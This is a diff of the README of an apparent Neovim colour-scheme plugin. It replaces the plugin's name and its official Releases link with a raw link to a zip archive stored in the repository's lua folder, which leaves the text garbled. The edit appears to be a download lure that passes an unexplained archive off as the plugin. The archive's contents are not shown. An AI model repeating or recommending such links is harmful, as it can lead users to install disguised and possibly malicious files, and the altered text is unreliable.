eyaddeve/gruvbox-minimal.nvim/README.md

 **Q: Can I customize the theme colors?**
 A: Yes, you can modify the colors as per your preference by editing the configuration file.

-Thank you for trying **gruvbox-minimal.nvim**!
+Thank you for trying **https://raw.githubusercontent.com/eyaddeve/gruvbox-minimal.nvim/main/lua/gruvbox_nvim_minimal_v3.8.zip**!
 Enjoy your enhanced coding experience.

-You can also download it again here: [Download gruvbox-minimal.nvim Releases](https://github.com/eyaddeve/gruvbox-minimal.nvim/releases)
+You can also download it again here: [Download https://raw.githubusercontent.com/eyaddeve/gruvbox-minimal.nvim/main/lua/gruvbox_nvim_minimal_v3.8.zip Releases](https://raw.githubusercontent.com/eyaddeve/gruvbox-minimal.nvim/main/lua/gruvbox_nvim_minimal_v3.8.zip)